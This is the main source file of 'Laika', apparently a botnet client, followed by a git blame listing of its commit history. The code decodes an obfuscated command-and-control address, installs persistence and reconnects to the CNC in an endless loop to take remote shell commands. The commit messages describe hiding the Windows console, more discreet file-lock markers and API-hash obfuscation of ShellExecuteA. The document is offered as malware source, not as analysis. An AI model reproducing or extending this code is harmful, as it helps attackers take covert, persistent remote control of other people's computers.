Laika/bot/src/main.c

#include "bot.h"
#include "core/lbox.h"
#include "core/lerror.h"
#include "core/ltask.h"
#include "lconfig.h"
#include "lobf.h"
#include "persist.h"
#include "shell.h"

#include <stdio.h>

/* if LAIKA_PERSISTENCE is defined, this will specify the timeout for 
    retrying to connect to the CNC server */
#define LAIKA_RETRY_CONNECT 5

#ifdef _WIN32
#    ifndef LAIKA_DEBUG_BUILD
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, PSTR lpCmdLine, INT nCmdShow)
{
#    else
int main()
{
#    endif
#else
int main()
{
#endif
    /* these boxes are really easy to dump, they're unlocked at the very start of execution and left
       in memory the entire time. not only that but they're only obfuscating the ip & port, both are
       things anyone would see from opening wireshark */
    LAIKA_BOX_SKID_START(char *, cncIP, LAIKA_CNC_IP);
    LAIKA_BOX_SKID_START(char *, cncPORT, LAIKA_CNC_PORT);
    struct sLaika_bot *bot;

    /* init API obfuscation (windows only) */
    laikaO_init();

#ifdef LAIKA_PERSISTENCE
    laikaB_markRunning();

    /* install persistence */
    laikaB_tryPersist();
    do {
#endif
        bot = laikaB_newBot();

        LAIKA_TRY
            /* connect to test CNC */
            laikaB_connectToCNC(bot, cncIP, cncPORT);

            /* while connection is still alive, poll bot */
            while (laikaS_isAlive((&bot->peer->sock))) {
                laikaB_poll(bot);
            }
        LAIKA_TRYEND

        /* bot was killed or it threw an error */
        laikaB_freeBot(bot);
#ifdef LAIKA_PERSISTENCE
#    ifdef _WIN32
        Sleep(LAIKA_RETRY_CONNECT*1000);
#    else
        sleep(LAIKA_RETRY_CONNECT);
#    endif
    } while (1);

    laikaB_unmarkRunning();
#endif

    /* vm boxes are left opened */
    return 0;
}
Added .clang-format, formatted codebase 2022-06-27 23:57:00 +00:00			`#include "bot.h"`
Refactoring: reorganized files 2022-09-02 01:00:37 +00:00			`#include "core/lbox.h"`
			`#include "core/lerror.h"`
			`#include "core/ltask.h"`
Added LAIKA_CNC_IP & LAIKA_CNC_PORT to cmake config 2022-03-15 18:05:11 +00:00			`#include "lconfig.h"`
Moved API obfuscation to LaikaLib target 2022-07-16 21:09:33 +00:00			`#include "lobf.h"`
Added crontab persistence, disabled by default with LAIKA_NOINSTALL - undefine LAIKA_NOINSTALL in persist.h to enable persistence - windows persistence is still unimplemented 2022-04-07 23:11:58 +00:00			`#include "persist.h"`
Added .clang-format, formatted codebase 2022-06-27 23:57:00 +00:00			`#include "shell.h"`

			`#include <stdio.h>`
Added LAIKAPKT_SHELL_*, fixed variadic packets - added bot/shell.[ch] - simple demo cnc which runs 'ls -a' on the connect peer 2022-02-21 23:25:49 +00:00
VMBoxGen: minor refactoring 2022-10-08 23:32:33 +00:00			`/* if LAIKA_PERSISTENCE is defined, this will specify the timeout for`
			`retrying to connect to the CNC server */`
			`#define LAIKA_RETRY_CONNECT 5`

Bot: windows builds no longer open a console 2022-05-15 23:14:29 +00:00			`#ifdef _WIN32`
minor 'DEBUG' refactoring - for debug builds, the LAIKA_DEBUG_BUILD macro will be defined in lconfig.h - LAIKA_OBFUSCATE now controls the winobf IAT obfuscation as well 2022-10-06 01:36:49 +00:00			`# ifndef LAIKA_DEBUG_BUILD`
Added .clang-format, formatted codebase 2022-06-27 23:57:00 +00:00			`int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, PSTR lpCmdLine, INT nCmdShow)`
			`{`
Bot: misc. formatting fixes 2022-06-29 22:45:51 +00:00			`# else`
Added .clang-format, formatted codebase 2022-06-27 23:57:00 +00:00			`int main()`
			`{`
Bot: misc. formatting fixes 2022-06-29 22:45:51 +00:00			`# endif`
Bot: windows builds no longer open a console 2022-05-15 23:14:29 +00:00			`#else`
Added .clang-format, formatted codebase 2022-06-27 23:57:00 +00:00			`int main()`
			`{`
Bot: windows builds no longer open a console 2022-05-15 23:14:29 +00:00			`#endif`
Added .clang-format, formatted codebase 2022-06-27 23:57:00 +00:00			`/* these boxes are really easy to dump, they're unlocked at the very start of execution and left`
Bot: misc. formatting fixes 2022-06-29 22:45:51 +00:00			`in memory the entire time. not only that but they're only obfuscating the ip & port, both are`
			`things anyone would see from opening wireshark */`
Added .clang-format, formatted codebase 2022-06-27 23:57:00 +00:00			`LAIKA_BOX_SKID_START(char *, cncIP, LAIKA_CNC_IP);`
			`LAIKA_BOX_SKID_START(char *, cncPORT, LAIKA_CNC_PORT);`
More resilient persistence - bot will keep trying to connect if it failed to connect to the CNC or if the bot was killed - if crontab isn't installed the bot will still run 2022-04-10 20:45:30 +00:00			`struct sLaika_bot *bot;`
First actual runnable version - many warnings & bug fixes - added bot/ source 2022-01-25 03:46:29 +00:00
Bot: Added boilerplate windows API obfuscation - Grabs the functions directly from the loaded library by walking the exported address table and comparing hashes - For now, only ShellExecuteA has been setup, more to come 2022-07-08 04:23:39 +00:00			`/* init API obfuscation (windows only) */`
			`laikaO_init();`

Linux: implemented laikaB_markRunning() & laikaB_unmarkRunning() - switched to file locks as that's more discreet - tied to LAIKA_PERSISTENCE being defined 2022-04-17 03:56:05 +00:00			`#ifdef LAIKA_PERSISTENCE`
			`laikaB_markRunning();`

Added crontab persistence, disabled by default with LAIKA_NOINSTALL - undefine LAIKA_NOINSTALL in persist.h to enable persistence - windows persistence is still unimplemented 2022-04-07 23:11:58 +00:00			`/* install persistence */`
			`laikaB_tryPersist();`
More resilient persistence - bot will keep trying to connect if it failed to connect to the CNC or if the bot was killed - if crontab isn't installed the bot will still run 2022-04-10 20:45:30 +00:00			`do {`
			`#endif`
			`bot = laikaB_newBot();`

			`LAIKA_TRY`
			`/* connect to test CNC */`
VMBoxGen refactor, obfuscate static CNC ip & port strings - VMBoxGen is built before shared lib - VMBoxGen has no reliance on the shared lib, just the config file - main config was moved to the root cmakelists 2022-05-19 06:42:40 +00:00			`laikaB_connectToCNC(bot, cncIP, cncPORT);`
More resilient persistence - bot will keep trying to connect if it failed to connect to the CNC or if the bot was killed - if crontab isn't installed the bot will still run 2022-04-10 20:45:30 +00:00
			`/* while connection is still alive, poll bot */`
			`while (laikaS_isAlive((&bot->peer->sock))) {`
Bot: Only run shell task when shell is open - since the shell task is only ran when the shell is open, i decreased the delta to 50ms. this should improve latancy while improving performance for 99% of the time. yay! 2022-04-14 17:11:29 +00:00			`laikaB_poll(bot);`
More resilient persistence - bot will keep trying to connect if it failed to connect to the CNC or if the bot was killed - if crontab isn't installed the bot will still run 2022-04-10 20:45:30 +00:00			`}`
			`LAIKA_TRYEND`

			`/* bot was killed or it threw an error */`
			`laikaB_freeBot(bot);`
			`#ifdef LAIKA_PERSISTENCE`
Bot: misc. formatting fixes 2022-06-29 22:45:51 +00:00			`# ifdef _WIN32`
VMBoxGen: minor refactoring 2022-10-08 23:32:33 +00:00			`Sleep(LAIKA_RETRY_CONNECT*1000);`
Bot: misc. formatting fixes 2022-06-29 22:45:51 +00:00			`# else`
VMBoxGen: minor refactoring 2022-10-08 23:32:33 +00:00			`sleep(LAIKA_RETRY_CONNECT);`
Bot: misc. formatting fixes 2022-06-29 22:45:51 +00:00			`# endif`
More resilient persistence - bot will keep trying to connect if it failed to connect to the CNC or if the bot was killed - if crontab isn't installed the bot will still run 2022-04-10 20:45:30 +00:00			`} while (1);`
Linux: implemented laikaB_markRunning() & laikaB_unmarkRunning() - switched to file locks as that's more discreet - tied to LAIKA_PERSISTENCE being defined 2022-04-17 03:56:05 +00:00
			`laikaB_unmarkRunning();`
More resilient persistence - bot will keep trying to connect if it failed to connect to the CNC or if the bot was killed - if crontab isn't installed the bot will still run 2022-04-10 20:45:30 +00:00			`#endif`
Added LAIKAPKT_SHELL_*, fixed variadic packets - added bot/shell.[ch] - simple demo cnc which runs 'ls -a' on the connect peer 2022-02-21 23:25:49 +00:00
VMBoxGen refactor, obfuscate static CNC ip & port strings - VMBoxGen is built before shared lib - VMBoxGen has no reliance on the shared lib, just the config file - main config was moved to the root cmakelists 2022-05-19 06:42:40 +00:00			`/* vm boxes are left opened */`
First actual runnable version - many warnings & bug fixes - added bot/ source 2022-01-25 03:46:29 +00:00			`return 0;`
			`}`